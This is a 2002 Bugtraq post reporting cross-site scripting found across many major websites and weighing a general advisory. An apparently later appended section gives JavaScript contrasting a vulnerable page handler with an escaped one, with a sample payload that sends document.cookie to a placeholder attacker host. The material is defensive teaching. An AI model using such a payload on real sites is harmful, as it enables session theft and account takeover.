[24826] in bugtraq


Cross-site scripting.

daemon@ATHENA.MIT.EDU (Berend-Jan Wever)
Mon Mar 25 21:24:57 2002

Message-ID: <003201c1d2aa$b1ae54b0$1b59a182@grotedoos>
From: "Berend-Jan Wever" <skylined@edup.tudelft.nl>
To: "bugtraq" <bugtraq@securityfocus.com>
Date: Sat, 23 Mar 2002 21:38:30 +0100
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

This message assumes basic knowledge about Cross-site scripting (CSS) and
its implications. For a quick summary of its implications, see the bottom of
this message first.

I have recently done a "CSS marathon" and found _almost_ every page I tried
vulnerable within half an hour. These include microsoft, altavista,
google, cnet, time, ebay, amazon, netscape, yahoo and redhat. This list
probably could have gone on forever if I had taken the time. I have
contacted every one of them about this (except for yahoo and ebay because I
was unable to find a contact email address or feedback form; if it takes
longer to find the contact info than to find the CSS, f#ck 'em). I am now
awaiting their responses.

But the ease with which I CSS-ed the hell out of every one of them got me
thinking. I'm not going to be the "beta-tester" slave for the whole
internet. The sites I contacted will probably just patch the one hole I
found, so I will probably be able to find others, and what about all the sites
I haven't tried yet? Maybe there should be a "general advisory" going out to
every web designer out there that CSS is as dangerous as it is common.
Feedback on the usefulness (or futility) of a "general CSS advisory" would
be appreciated.


Berend-Jan Wever

--------------------------------------------
CSS implications

By opening a specially crafted URL in the targeted user's web browser (for
instance when he visits your website or reads an email you sent him), you can:
- read anything that user can read from the CSS-vulnerable site
(address book, personal info, etc.)
- do whatever that user can do on the CSS-vulnerable site (send messages,
order stuff, change personal settings and passwords)
- spoof the contents of the CSS-vulnerable site (make somebody think he is
looking at www.foo.com while the contents of the page actually come from
your site www.bar.com)
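
--------------------------------------------
Added example (editor's note, not part of the original post): the reflected
case the "CSS implications" section describes, shown as a minimal page handler
that echoes a query parameter, beside the same handler with the value escaped
for the HTML text context it lands in. The /search page, the q parameter and
the attacker URL are constructed for illustration; www.foo.com and www.bar.com
are the placeholder names used above. The script in the crafted URL would run
in the origin of the vulnerable site, which is why it can read that site's
cookies and act as the user; the escaped version renders the same bytes as
inert text.

```javascript
// Minimal reflected cross-site scripting bug and its fix (added example).
// Page path, parameter name and attacker payload are assumptions.

// Vulnerable: the untrusted query value is pasted straight into the page.
function renderSearchVulnerable(requestUrl) {
  const q = new URL(requestUrl).searchParams.get("q") ?? "";
  return `<html><body><h1>Results for: ${q}</h1></body></html>`;
}

// Escape the characters that let text break out of an HTML text node or a
// quoted attribute value. This is context-specific: it is correct for HTML
// text and attribute values, not for data placed inside <script> or a URL.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened: identical page, but the untrusted value is escaped on output.
function renderSearchHardened(requestUrl) {
  const q = new URL(requestUrl).searchParams.get("q") ?? "";
  return `<html><body><h1>Results for: ${escapeHtml(q)}</h1></body></html>`;
}

// Crude check used below: did a <script> element make it into the response?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed attacker URL. If the page executed this, the victim's cookie
// for www.foo.com would be sent to www.bar.com (the "read anything that
// user can read" case from the post).
const payload =
  '<script>document.location="http://www.bar.com/?c="+document.cookie</script>';
const craftedUrl = "http://www.foo.com/search?q=" + encodeURIComponent(payload);

// A harmless query, to show the hardened handler still renders normal input.
const benignUrl = "http://www.foo.com/search?q=" + encodeURIComponent("Tom & Jerry");

console.log("vulnerable:", renderSearchVulnerable(craftedUrl));
console.log("hardened:  ", renderSearchHardened(craftedUrl));
console.log("benign:    ", renderSearchHardened(benignUrl));
```

The fix is applied at the point of output, not on input: the same value may be
safe in one context and dangerous in another, so escaping for the context the
value is written into is what actually closes the hole.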
